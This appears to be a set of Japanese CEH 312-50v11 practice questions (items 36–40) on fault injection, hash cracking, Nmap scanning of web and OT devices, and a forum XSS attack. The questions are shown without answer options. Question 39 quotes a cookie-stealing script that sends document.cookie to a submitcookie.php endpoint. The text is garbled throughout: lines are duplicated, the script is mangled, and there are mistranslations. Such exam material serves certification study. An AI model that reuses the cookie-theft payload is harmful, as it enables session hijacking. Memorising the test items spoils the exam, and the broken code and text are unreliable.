312-50v11 試験問題 36
プロのハッカーである Robert は、ターゲットの IoT デバイスに対してフォールト インジェクション攻撃を実行しようとしています。このプロセスでは、リモート実行に使用できる電源に障害を挿入し、重要な命令のスキップも引き起こします。彼はまた、チップ全体に同期信号を配信するために使用されるクロック ネットワークに障害を挿入します。
上記のシナリオで、Robert が実行したフォールト注入攻撃のタイプは次のうちどれですか?
上記のシナリオで、Robert が実行したフォールト注入攻撃のタイプは次のうちどれですか?
312-50v11 試験問題 37
Windows 2000 ドメイン コントローラから生のハッシュ値を取得しました。ソーシャル エンジニアリングを使用すると、強力なパスワードを強制していることがわかります。すべてのユーザーは、8 文字以上の長さのパスワードを使用する必要があることを理解しています。すべてのパスワードには、小文字、大文字、数字、および特殊文字の 4 つのカテゴリのうち 3 つも使用する必要があります。ユーザーに関する既存の知識、可能性の高いユーザー アカウント名、およびユーザーが可能な限り簡単なパスワードを選択する可能性を考慮して、これらのハッシュ値に対して実行し、結果を得ることができる最速のタイプのパスワード クラッキング攻撃は何でしょうか?
312-50v11 試験問題 38
Web アプリケーションのスキャン中にテストを調整するために、アプリケーションをホストしている Web サーバーのバージョンを特定することにしました。Nmap で sV フラグを使用する場合。次の応答が得られます。
80/tcp オープン http-proxy Apache Server 7.1.6
これが最もよく表している情報収集技術は何ですか?
80/tcp オープン http-proxy Apache Server 7.1.6
これが最もよく表している情報収集技術は何ですか?
312-50v11 試験問題 39
ある日、Judy はフォーラムを作成しました。彼女は、ユーザーがコメントを書かずに奇妙な画像を投稿していることを発見しました。
彼女はすぐにセキュリティの専門家に電話をかけ、次のコードがこれらの画像の背後に隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?
彼女はすぐにセキュリティの専門家に電話をかけ、次のコードがこれらの画像の背後に隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?
312-50v11 試験問題 40
プロのハッカーであるジムは、重要な産業インフラを運用している組織を標的にしました。Jim は Nmap を使用して、組織の OT ネットワークに接続されたシステムで開いているポンと実行中のサービスをスキャンしました。彼は Nmap コマンドを使用して、インターネットに接続されたイーサネット/IP デバイスを識別し、さらにベンダー名、製品コードと名前、デバイス名、IP アドレスなどの情報を収集しました。次の Nmap コマンドのうち、ジムが必要な情報を取得するのに役立ったのはどれですか?